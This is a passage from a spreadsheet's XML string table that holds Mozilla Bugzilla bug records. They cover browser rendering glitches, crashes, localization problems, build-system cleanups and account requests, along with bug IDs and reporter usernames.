    <t>Many other functions reply on this such as js popup window print preview 
windows view source window.</t>
  </si>
  <si>
    <t>CORE-461844</t>
  </si>
  <si>
    <t>windows mobile minor cleanup of media</t>
  </si>
  <si>
    <t>we have reduce our dependency on many of the functions and defines in a windows mobile porting library (wince shunt).</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-342594</t>
  </si>
  <si>
    <t>Reload button and menu-item should be disabled when about:blank page is loaded</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.9a1) Gecko/20060624 Camino/1.2+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.9a1) Gecko/20060624 Camino/1.2+
Set about:blank as home page URI
Open new tab/window
Reload button the menu item and the contextual menu item for 'Reload' are all active but there is nothing to reload. Technically about:blank is not empty but still...
In Firefox and Safari those items are disabled.
Reproducible: Always
Expected Results:  
Reload button the menu item and the contextual menu item disabled when loading about:blank page</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-222827</t>
  </si>
  <si>
    <t>sysopt.com - vBulletin 2.2.6 needs upgrading - when trying to view JPG files Mozilla prompts to save it to disk.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.5) Gecko/20031007 Firebird/0.7
When one tries to view a jpg file in a new windows Mozilla Firebird 0.7 tries
to open it in different image viewer instead of opening it in its own browser
window.
why is this happenning. what i am saying is it asks the jpg files to first be
saved on to the harddrive and then open in an associated application/program
which in my case happens to be Irfanview.
I think it should open the JPG in its own windows like in other browsers like
IE Netscape etc.
Reproducible: Always
Steps to Reproduce:
1.In the link that i posted above on all the jpg files uploaded first click on
them
2.Mozilla opens the file in a new windows prompts to either save to disk or
open in a associated application like Irfanview.
Actual Results:  
One has to download the whole jpg and can only be viewed by Image browsers not
by Mozilla.
Expected Results:  
Simply open it in Mozilla instead of asking to save or open in other image browser.
no crash just a wrong behaviour. Never happens with any other browser also i
think you had no such kinda bugs in Mozilla 1.2 hope that helps.</t>
  </si>
  <si>
    <t>trinity9876</t>
  </si>
  <si>
    <t>TOOLKIT-496019</t>
  </si>
  <si>
    <t>mozilla::storage::Connection::Close can spin a nested event loop</t>
  </si>
  <si>
    <t>Created attachment 381160
stack trace (mozilla::storage::Connection::Close -&gt; nsThread::Shutdown -&gt; NS_ProcessNextEvent_P)
mozilla::storage::Connection::Close can spin a nested event loop.  bent says this is bad.
(I noticed this while looking at a crash stack trace but I don't know if this bug is directly responsible for the crash.)</t>
  </si>
  <si>
    <t>FIREFOX-269933</t>
  </si>
  <si>
    <t>Main window loses maximized status when Firefox open new tab from local file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Main window loses maximized status when Firefox open new tab from local file.
File should be opened outside Firefox (i.e. from Windows Explorer)
Reproducible: Always
Steps to Reproduce:
1. Start FF
2. Maximize FF's main window
3. Open local HTML file from Windows Explorer
Actual Results:  
Main window loses maximized status
Expected Results:  
Main window shoud stay maximized
IMHO all Windows platforms affected</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-280035</t>
  </si>
  <si>
    <t>AIX binary links lead to 404 because of improper directory reference</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
These are the links on the website it should be 
AIX:
http://ftp.mozilla.org/pub/firefox/releases/1.0/contrib/firefox-powerpc-ibm-aix5.1.0.0-1.0.tar.gz
http://ftp.mozilla.org/pub/firefox/releases/1.0/contrib/firefox-powerpc-ibm-aix4.3.3.0-1.0.tar.gz
AIX:
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/1.0/contrib/firefox-powerpc-ibm-aix5.1.0.0-1.0.tar.gz
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/1.0/contrib/firefox-powerpc-ibm-aix4.3.3.0-1.0.tar.gz
Reproducible: Always
Steps to Reproduce:
1. Click on the link specified above it leads to a 404 since the directory
reference is incorrect
Actual Results:  
404 
Expected Results:  
Lead to the download of the said software</t>
  </si>
  <si>
    <t>ramas_smx</t>
  </si>
  <si>
    <t>MOZILLA.ORG-406085</t>
  </si>
  <si>
    <t>Refresh MozillaBuild toolchain (1.2)</t>
  </si>
  <si>
    <t>We need to get an updated MozillaBuild out.  We've got some fixes on trunk and we should get just a few more fixes in and then release.  We'll punt MSYS updates and some other things to the next version.</t>
  </si>
  <si>
    <t>CORE-324967</t>
  </si>
  <si>
    <t>Black stripes and delay while scrolling in Cairo</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060127 Firefox/1.6a1 ID:2006012704
Steps to reproduce:
1. Go to http://www.rnw.nl/nieuws/nederlands.html#3292436
2. Set smooth scrolling on in Options &gt; Advanced (not sure if this is required)
3. Then scroll down quickly
4. You'll see black stripes and if not
5. Grab the scrollbar and scroll as fast as you can
6. And you'll notice a certain delay.
7. Now start a normal trunk build in the same profile and go to the site
8. And do the same
9. You'll notice that it scrolls a lot quicker without stripes</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-236604</t>
  </si>
  <si>
    <t>citibank.com - TD's background-color style property sometimes isn't shown</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040113
TD's background-color style property sometimes isn't shown correctly... tried to
reproduce the case locally but without success: anyway using the provided url
(http://www.citibank.com/italy/homepage/) the bug can be noticed but saving the
page locally and then opening it the supposed bug is not present.
Reproducible: Always
Steps to Reproduce:
1. go to http://www.citibank.com/italy/homepage/
2. check the TABs named Investimenti Prestiti Carta di credito on the
upper side of the page: the background images are not displayed
3. check the same url using Internet Explorer the page will be shown correctly
Actual Results:  
some TD's backround images are not shown
Expected Results:  
show all the cells' background images
if you save the full page locally (with IE) and then open it with Mozilla it
will be shown correctly</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-186056</t>
  </si>
  <si>
    <t>browser crashed on second call to applet using javascript</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1) Gecko/20020826
A javascript function at http://www.webdice.org/help.html crashes the browser
when it attempts to call an applet the second time. 
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.webdice.org/help.html with java and javascript enabled.
2.Press the Browser Information button half way down the page.
3.Dissmiss the javascript alert
4.Disable java in Edit..Preferances..Advanced
5.Press the Browser Information
6.Dissmiss the javascript alert
7.Go to http://www.webdice.irg/index.html
8.Enable java
9.Go back to the help page and click the Browser Information button
Actual Results:  
crashes browser
Expected Results:  
javascript alert should display java information</t>
  </si>
  <si>
    <t>pschmandra</t>
  </si>
  <si>
    <t>CORE-518055</t>
  </si>
  <si>
    <t>Turn recursive descent parsing functions into JSCompiler methods remove parameters</t>
  </si>
  <si>
    <t>Brendan suggested the cleanups below in bug 517990 and asked:
&gt; Jim: you want to do it? I was going to do it as parasympathetic nervous system
&gt; therapy some night but it's fair game for anyone.
Sure --- I've promised strict mode and breakpad CFI at the moment but once those are in the clear this would be satisfying to do.  But it's filed as a bug now so anyone with gumption should grab it.
---
The bigger cleanup I kept refraining from doing in the upvar2 work to keep the
patch only insanely big instead of super-insanely big is to get rid of almost
all the parameters to jsparse.cpp functions making most of them methods of
JSCompiler. This should speed up the recursive-descent parser.
Beyond this there are some cleanups to jsscan.h to use C++ canonical style. But
again the JSCompiler wants at least some inline helpers to forward calls on
itself to its tokenStream member to save typing and shorten lines full of
redundancy in jsparse.cpp.
---
To say a bit more all the C static functions that have the JSParser signature:
typedef JSParseNode *
JSParser(JSContext *cx JSTokenStream *ts JSTreeContext *tc)
become JSCompiler methods taking zero args. Any cx uses become free and need to
rename to context -- or better we rename JSCompiler::context -&gt; cx. Similarly
for ts -&gt; &amp;tokenStream mutatis mutandis. The tc param needs to be a top of
tree context stack pointer in JSCompiler but that's easy to do too.
Hope this helps and actually wins. Zero params has to make a difference on
code perf as well as size even if we sometimes load this-&gt;cx or whatever. But
a second opinion is welcome.</t>
  </si>
  <si>
    <t>THUNDERBIRD-439364</t>
  </si>
  <si>
    <t>Eliminate GetResourceForUri</t>
  </si>
  <si>
    <t>Created attachment 325203
patch v1
Nobody actually wants (or should want) the rdf resource associated with a folder.  They just want the actual nsIMsgFolder.  This function should go away. Looking for philor for the mail/ bits and Neil for the mailnews/ side</t>
  </si>
  <si>
    <t>CORE-126592</t>
  </si>
  <si>
    <t>native widgets limited to 16-bit coordinates cause errors on long pages</t>
  </si>
  <si>
    <t>Ok i havn't slept tonight so i might see a vision. When looking at comment 285
bug 68136 there grey box with a native scrollbar in it.
This is on a Win98SE build from maybe a week ago
I have no idea where this bug belongs but i figured at least someone on layout
can see what code creates the frame/does the painting...</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-94148</t>
  </si>
  <si>
    <t>Cannot access subfolders of subfolder Inboxes</t>
  </si>
  <si>
    <t>I have an IMAP subfolder named Inboxes containing other folders. When selecting
those folders I get:
The current command did not succeed. The mail server responded: SELECT failed:
Can't open mailbox INBOXes/foo: no such mailbox.
What seems to have happened is that Mozilla has transformed the folder name from
Inboxes to INBOXes which unsurprisingly doesn't work. The folder list also
lists it as INBOXes.
I suspect somewhere there is a substring match in mozilla for inbox to display
it in upper case which should actually be an exact string match.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS_GRAVEYARD-461203</t>
  </si>
  <si>
    <t>Some false positives in Check Endings test when run in All Above At Once</t>
  </si>
  <si>
    <t>The title says it all... Running Check All Above At Once test sometimes include some check ending results reporting things like:
- Original and translation have different ending chars ([.] vs. [.])</t>
  </si>
  <si>
    <t>FIREFOX-176041</t>
  </si>
  <si>
    <t>#ifdeffing DTD files created translation nightmare</t>
  </si>
  <si>
    <t>The concept of putting platform #ifdefs in DTD files is VERY bad for 
translation.
It means that there will have to be a new translation for each platform rather 
than sharing translation between unix/windows/OS/2.
We need a better way to do this.</t>
  </si>
  <si>
    <t>CORE-110399</t>
  </si>
  <si>
    <t>Expiration date not set if http Date: header missing</t>
  </si>
  <si>
    <t>Overview Description:  The document expiration date does not get set without a
Date header.   Most servers will supply this header but in case they do not or
someone writing a script forgets it we should be able to handle this.  
Steps to Reproduce:
1.)  Go to the url. (internal only)
Actual Results:  expiration date does not get set
Expected Results:  expiration date should get set 
Build Date &amp; Platform Bug Found:  WinNT 200111123
Additional information:
This script is running internally on an ms IIS server.  If you remove the nph-
(non parsed header) from the filename the server will supply the Date: header
automatically.</t>
  </si>
  <si>
    <t>badami</t>
  </si>
  <si>
    <t>tever</t>
  </si>
  <si>
    <t>CORE-461323</t>
  </si>
  <si>
    <t>Crash [@ js_GetLengthProperty]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Build Identifier: 
#48 top crash for Firefox 3.1b1
This crash occurs on both Windows and Mac. I'm filing this as critical since it is a crash.
Stack Trace:
0     libmozjs.dylib     js_GetLengthProperty       js/src/jsarray.cpp:229
1     libmozjs.dylib     PushObject                 js/src/json.cpp:499
2     libmozjs.dylib     js_ConsumeJSONText         js/src/json.cpp:535
3     libmozjs.dylib     js_json_parse              js/src/json.cpp:81
4     libmozjs.dylib     js_Interpret               js/src/jsinterp.cpp:4985
5     libmozjs.dylib     js_Invoke                  js/src/jsinvoke.cpp:1324
6     libmozjs.dylib     js_fun_apply               js/src/jsfun.cpp:1731
7     libmozjs.dylib     js_Interpret               js/src/jsinterp.cpp:4985
8     libmozjs.dylib     js_Invoke                  js/src/jsinvoke.cpp:1324
9     libmozjs.dylib     js_InternalInvoke          js/src/jsinvoke.cpp:1381
10    libmozjs.dylib     JS_CallFunctionValue       js/src/jsapi.cpp:5136
11    XUL                nsJSContext::CallEventHandler     dom/src/base/nsJSEnvironment.cpp:2000
12    XUL                nsGlobalWindow::RunTimeout        dom/src/base/nsGlobalWindow.cpp:7721
Reproducible: Didn't try
Discovered this from analysis of top crashes in Firefox 3.1b1
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;version=Firefox%3A3.1b1&amp;query_search=signature&amp;query_type=contains&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=js_GetLengthProperty
example crash report:
http://crash-stats.mozilla.com/report/index/0e37eaa6-9f1e-11dd-8ff8-001cc45a2ce4</t>
  </si>
  <si>
    <t>crf</t>
  </si>
  <si>
    <t>CORE-267426</t>
  </si>
  <si>
    <t>an empty file when dragging images (files) out of the browser to the Windows desktop or Explorer or drives other than C:</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20040910
When dragging a large image (file) out of Mozilla browser winodw to the desktop
on Windows you can get an empty or incomplete file at the drop location and
sometimes even a Sharing Violation error.
Reproducible: Always
Steps to Reproduce:
1. Find some large image on the net (eg.
http://www.pakistan-tradenetwork.com/admin/images/vase-%20large.jpg)
2. Wait until it downloads. Then clear the browser's cache
(Edit-&gt;Preferences...Advanced-&gt;Cache [Clear cache] button)
3. Try to drag the image to desktop.
Actual Results:  
I get an incomplete file - not the image I was expecting.
When I try to open that newly created file I get this message in mozilla
'The image â€œhttp://www.pakistan-tradenetwork.com/admin/images/vase-%20large.jpgâ€
cannot be displayed because it contains errors.'
Expected Results:  
Mozilla should download the image (file).</t>
  </si>
  <si>
    <t>ykovalchuk</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-453768</t>
  </si>
  <si>
    <t>Make the start page look less like an error page?</t>
  </si>
  <si>
    <t>Just a random though as I fired up a default profile and then went to a security error page: our start page looks *a lot* like our error page. Do we want to do something to give the start page at least a little more visual distinction from an error?</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-225248</t>
  </si>
  <si>
    <t>update Browser/Build Config assignee/QA</t>
  </si>
  <si>
    <t>Per a discussion with leaf we want to change the default assignee/QA for the
Browser/Build Config component:
assignee: nobody@mozilla.org
QA: build-config@bugs.mozilla.org (or whatever the appropriate form for generic
watcher emails is)
--BDS</t>
  </si>
  <si>
    <t>CORE-224087</t>
  </si>
  <si>
    <t>IS_CJ_CHAR should not return true for u &gt; 0xFFEF</t>
  </si>
  <si>
    <t>/Users/timeless/mozilla/content/base/src/nsPlainTextSerializer.cpp:
 In member function `void nsPlainTextSerializer::Write(const nsAString&amp;)':
1761: warning: comparison is always true due to limited range of data type
1761: warning: comparison is always true due to limited range of data type</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG_GRAVEYARD-907285</t>
  </si>
  <si>
    <t>Sandstone/Mozilla Skin</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG_GRAVEYARD</t>
  </si>
  <si>
    <t>Background repeats in new sandstone theme</t>
  </si>
  <si>
    <t>Created attachment 792935
A screenshot of the theme before the fix is applied
The background on the body element repeats unnecessarily. This is caused by the background not being set to no-repeat. The following styles fix the issue:
    background-repeat: repeat repeat-x
This should be placed at the end of the `body {}` declaration at the top of global.css. Note that it must be placed after the background-image rules or it will not be applied.</t>
  </si>
  <si>
    <t>mattbasta</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-246000</t>
  </si>
  <si>
    <t>Inconsistent creation of bookmarks in toolbar folders</t>
  </si>
  <si>
    <t>Creating a new bookmark by dragging the favicon into a toolbar folder creates a
bookmark at the top of the folder whereas adding a bookmark to any folder using
Add Page to Bookmarks always creates the bookmark at the bottom of the target
folder. We should be consistent (probably changing the DnD to add to the bottom).</t>
  </si>
  <si>
    <t>CORE-129909</t>
  </si>
  <si>
    <t>Rename nsGfxTextControlFrame2.cpp</t>
  </si>
  <si>
    <t>Remove nsGfxTextControlFrame.cpp and rename nsGfxTextControlFrame2.cpp to
nsGfxTextControlFrame.cpp.  No need for this darn 2 stuff now that there aren't
2 of them.
Heck I don't know what the Gfx is there for but maybe we can remove that while
we're at it.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-496010</t>
  </si>
  <si>
    <t>Add johnath to mv-all us-all mailing lists</t>
  </si>
  <si>
    <t>I have direct reports there I think it makes sense for me to see that traffic even if I'm not there myself.  I don't know if us-all is a list-of-lists and hence mv-all membership gets me onto there but if not please add me there as well.</t>
  </si>
  <si>
    <t>CORE-370031</t>
  </si>
  <si>
    <t>Cycling through tabindex among HTML inputs only works once</t>
  </si>
  <si>
    <t>Created attachment 254707
testcase
I discovered this while testing a fix for bug 306058.
Steps to reproduce:
(1) Tab all the way through the document.
(2) Tab past the URL bar and search bar in the main window.
(3) Tab until you land in another HTML input.
Expected results:
You should land in the third HTML input (index 1).
Actual results:
You land in the first HTML input (no index).
requresting blocking1.9: This is actually an accessibility issue because the next tab doesn't take you to another HTML input - but instead out of the document altogether.</t>
  </si>
  <si>
    <t>BUGZILLA-24896</t>
  </si>
  <si>
    <t>Make First/Last/Prev/Next Work with multiple buglists at once</t>
  </si>
  <si>
    <t>When I am searching through two seperate bug list queries in two different
windows the First Last Prev Next and Show list links work off of the
latest query that I preformed.
Steps to reproduce:
Run a query in bugzilla.
Open a bug from that query list.
Open a new window.
Run a different query in that window.
Go back to the first window and click on the Show list link.
Result:
The list shown is from the second query.
Expected Result:
Should show the list from the first query.</t>
  </si>
  <si>
    <t>derikson3</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-126443</t>
  </si>
  <si>
    <t>ssa.gov - Social Security Administration On-Line Wage (W-2) filing doesn't work.</t>
  </si>
  <si>
    <t>When I enter my Employer PIN and password at the login page and hit
the Submit button nothing is sent from the browser.  No packets
whatever can be seen with a packet sniffer so the Submit button
actually doesn't work at all.  I suspect this is javascript.
To reach the page in question you must navigate there as follows:
http://www.ssa.gov/employer/esohome.htm?
then click Online Wage Reporting Service(OWRS)
next click the I Accept button.
Enter some data in the PIN and Password fields and
click Submit.  You will see that no packets get
sent to the web site.
This is a *very* important web site for businesses.
I need to report my employees wages to SSA and
most every small business owner will be expecting
this web site to work properly within the next
year or two as online wage reporting will soon
be mandatory.
Note that Netscape 4.x and Konqueror both work
properly at this site.  I of course haven't even
tried MSIE but I imagine it works also.</t>
  </si>
  <si>
    <t>BUGZILLA-215210</t>
  </si>
  <si>
    <t>Mail notifications about statuses and resolutions still in english (not localizable)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.4) Gecko/20030625
Build Identifier: Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.4) Gecko/20030625
This is the email I've received when marking as A MI ME VALE (WORKSFORME) my
bug nÂº 6:
http://bugzilla-cvs.omgs.homelinux.org/show_bug.cgi?id=6
oscar@omgs.homelinux.org changed:
           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |WORKSFORME
------- Additional Comments From oscar@omgs.homelinux.org  2003-06-08 01:31 CEST
-------
This works for me but I think the bug can't be closed until this is implemented
in your bugzilla.
Reproducible: Always
Steps to Reproduce:
Expected Results:  
There are still many things to change:
- The word changed after the user name
- The line What Removed Added
- The text containing the text Status Resolution and the statuses and
resolutions themselves.
- The text Additional Comments From
- Optionally the time format.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-297829</t>
  </si>
  <si>
    <t xml:space="preserve">l10n CVS account request: French (fr-FR) - JÃ©rÃ´me Schell </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 fr rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)
CVS account request for JÃ©rÃ´me Schell French (fr-FR) Thunderbird localization
(owner).
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-225953</t>
  </si>
  <si>
    <t>text of ftp file doesn't appear</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031007 Firebird/0.7
The contents of a text file doesn't appear at the ftp-site above. When browsing
 ftp://apt.kde-redhat.org/apt/ with FireBird 0.7 as well as Mozilla 1.2.1 on
RedHat 9 the first time I access a text-file all is well and the contents get
displayed but the second time I access another text file the browser window
stays empty.
Reproducible: Always
Steps to Reproduce:
1. Go to ftp://apt.kde-redhat.org/apt/
2. Click README.txt
3. Go back
4. Click sources.list
Actual Results:  
An empty browser window
Expected Results:  
Show the contents of the text-file</t>
  </si>
  <si>
    <t>wvw</t>
  </si>
  <si>
    <t>CORE-520860</t>
  </si>
  <si>
    <t>Remove code to suppress Maemo autocomplete widget</t>
  </si>
  <si>
    <t>Created attachment 404897
patch
We added some code to suppress the builtin Maemo autocomplete widget. This really isn't something we should have tried to do. The API is not designed to work per-application. It's global. Our code isn't robust and could get the system out of sync if we crash.
This patch removes the code and let's the user deal with showing or hiding the autocomplete widget using the device's control panel.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-383139</t>
  </si>
  <si>
    <t>On Login screen Use SSL for data encryption doesnt do anything</t>
  </si>
  <si>
    <t>On Login screen Use SSL for data encryption doesnt do anything.  It should ensure that the |serverURL| is a https url.</t>
  </si>
  <si>
    <t>michael.koch</t>
  </si>
  <si>
    <t>SEAMONKEY-161113</t>
  </si>
  <si>
    <t>RFE: Advanced edit dialog can't be used when more than one cell is selected</t>
  </si>
  <si>
    <t>If I select multiple table cells I can change them all from  to  but
it's not possible to give them all the same css class (or ny other not
predefined attribute)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-433928</t>
  </si>
  <si>
    <t>L10N</t>
  </si>
  <si>
    <t>Expand website version of  Mozilla Manifesto to include multiple languages</t>
  </si>
  <si>
    <t>CORE-502123</t>
  </si>
  <si>
    <t>Switching focus out of a windowed plugin raises the toplevel window</t>
  </si>
  <si>
    <t>STR:
1. Ensure your window manager is configured so that clicking in a window does
   not raise the window.
2. Cover part (e.g. right hand edge) of a browser window viewing about:blank.
3. Click on the document and on the search bar.
   (Appropriately neither click raises the window.)
4. Load http://www.communitymx.com/content/source/E5141/wmodenone.htm (with
   a flash-capable plugin enabled).
5. Click on the plugin.  (Window is still not raised as expected.)
6. Click on the document outside the plugin.
Actual results: window raised.
Expected: window not raised.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-138937</t>
  </si>
  <si>
    <t>Error in form submission</t>
  </si>
  <si>
    <t>Whenever I click anywhere in the map it shows:
Error :
First parameter must be 'name'!!!
I'm using mozilla 1.0 rc1 on windows 2000 adv. server.</t>
  </si>
  <si>
    <t>waiting</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-520452</t>
  </si>
  <si>
    <t>use non breaking spaces instead of normal spaces in strings</t>
  </si>
  <si>
    <t>Created attachment 404499
hg export series
MicroB testing found one case of a breaking space which resulted in bad behavior. as French expects to have non breaking spaces.
I looked and discovered &gt;50 such French quotes which use the wrong kind of spaces.
I spoke with the French Localization team at Moz Camp EU 2009 and they indicated they'd be interested in fixes for this.
I'm attaching an hg export which includes a number of similar but distinct changes (for use with 'hg import') my username should be 'timeless@mozdev.org' as listed in the commits.
We also encountered one file which is broken in the en-US and a bug will be filed against it later....</t>
  </si>
  <si>
    <t>FIREFOX-249593</t>
  </si>
  <si>
    <t>[WinNT] Firefox won't start because of missing Function CopyStgMedium in urlmon.dll (or urlmon.dll doesn't exist at all)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.78 [en]C-CCK-MCD   (Win95 U)
Build Identifier: Can't say since it doesn't start but Installer contains the string 0.9
I downloaded FirefoxSetup-0.9.exe and installed it on a Windows 95 (4.00.950) 
without Internet Explorer. This system has URLMON.DLL version 4.70.1215. When I 
try to start Firefox windows tells me that export CopyStgMedium is missing in 
URLMON.DLL.
Firefox 0.8 is working well on the same system.
Reproducible: Always
Steps to Reproduce:
1. Install Firefox
2. Run Firefox
Actual Results:  
Firefox didn't start.
Expected Results:  
I expected Firefox 0.9 to run with the same DLL that 0.8 runs with.</t>
  </si>
  <si>
    <t>g.s</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-413321</t>
  </si>
  <si>
    <t>Smoketests page gives 403: Access Forbidden</t>
  </si>
  <si>
    <t>http://www.mozilla.org/quality/smoketests/ is giving a 403: Access Forbidden error.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-496715</t>
  </si>
  <si>
    <t>Update MDC skin to revision 27250</t>
  </si>
  <si>
    <t>This will relocate the page notification button into the TOC field and includes a couple of other minor corrections to better support the hiding of the sidebar that will be enabled by bug 496402.
This should be done at the same time as bug 496007.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-513629</t>
  </si>
  <si>
    <t>Mozilla Thunderbird 2.0.0.23 changelog created</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #499932 +++
http://www.rumblingedge.com/2009/08/31/thunderbird-2-0-0-23-released/
2.0.0.23 changelog is available and as has been posted for every TB version since ~2005. :)
Apologies for the slightly slower response for 2.0.0.23 I was (and still currently am ) on holiday here in New York.
ss tells me gozer now does these updates..</t>
  </si>
  <si>
    <t>BUGZILLA-425620</t>
  </si>
  <si>
    <t>checksetup.pl doesn't pick up the user's language correctly</t>
  </si>
  <si>
    <t>This may be Windows-only: setlocale() may return strings in the form of German_Germany.1252. This is unsuitable because expects language codes (de_DE.1252 would be good instead).</t>
  </si>
  <si>
    <t>SEAMONKEY-161617</t>
  </si>
  <si>
    <t>Remove blackwood/java variables from build system</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/modules/oji/src/Makefile.in#92 is 
defining -DJSJDLL based on the value of JSJDLL which is specified on 
http://lxr.mozilla.org/seamonkey/source/config/config.mk#819. That leads to 
-DJSJDLL=\libjsj..dll\ being used on windows &amp; -DJSJDLL=\libjsj..so\ being 
used on linux. 
Windows should be using:
JSJDLL = $(LIB_PREFIX)jsj$(MOZ_BITS)$(VERSION_NUMBER)$(DLL_SUFFIX)
Everything else:
JSJDLL = $(LIB_PREFIX)jsj$(DLL_SUFFIX)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-417065</t>
  </si>
  <si>
    <t>Add some tests for the more complex nsIAbCard functions</t>
  </si>
  <si>
    <t>Created attachment 302872
The fix
Looking at the review for bug 413260 I think it would help if we had at least some minimum tests for convertToBase64EncodedXML convertToXMLPrintData and convertToEscapedVCard.
The attached tests basically just take a fully-filled in nsIAbCard and checks the results for them.
Yes I did just copy and paste from what it currently does but I don't think that's too much of a problem. We can expand them later and think about standards then I'm just looking to get something in so that we can check we don't do major regressions.
Doing these functions also gives us the advantage is these functions should cover pretty much all the current properties that we use on ab cards.</t>
  </si>
  <si>
    <t>BUGZILLA-485836</t>
  </si>
  <si>
    <t>Write a script to tag releases</t>
  </si>
  <si>
    <t>One thing that takes a little time during release--but could definitely be automated--is tagging the releases. I'm going to write a script to do it and put it in the bugzilla.org CVS.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-197280</t>
  </si>
  <si>
    <t>4.x mail import broken for JA profiles</t>
  </si>
  <si>
    <t>For more details see bugscape bug #18088.</t>
  </si>
  <si>
    <t>THUNDERBIRD-264810</t>
  </si>
  <si>
    <t>Wrong file shipped as replicationProgress.properties</t>
  </si>
  <si>
    <t>Thunderbird 0.8 (20041017)
In the Address book choose File -&gt; New -&gt; LDAP Directory select the Offline
tab and click on the Download Now button.
Actual result:
A window with no title opens.
Expected result:
A window with the title: Replicating (null).
The likely cause:
http://lxr.mozilla.org/aviarybranch/source/mail/locales/jar.mn#115</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-213729</t>
  </si>
  <si>
    <t>should look in mem cache for messages when offline</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
if you have an IMAP mail account you see you messages and then disconnect you
can continue viewing those who had been read. but if you go to the offline mode
and you click one of those messages it sais that it isn't downloaded so it is
not viewable. this happens if you don't download your messages of course.
Reproducible: Always
Steps to Reproduce:
1.connect to an IMAP mail account and read a new mail
2.go to the offline mode
3.try to read it now
Actual Results:  
at least for the current session let me see the same I was able to see in
online modeit says that the message hasn't been downloaded so you can't see it
Expected Results:  
at least for the current session let me see the same I was able to see in
online mode</t>
  </si>
  <si>
    <t>galio</t>
  </si>
  <si>
    <t>NSS-201807</t>
  </si>
  <si>
    <t>DBM: Security databases get corrupt in gcc OS/2 build</t>
  </si>
  <si>
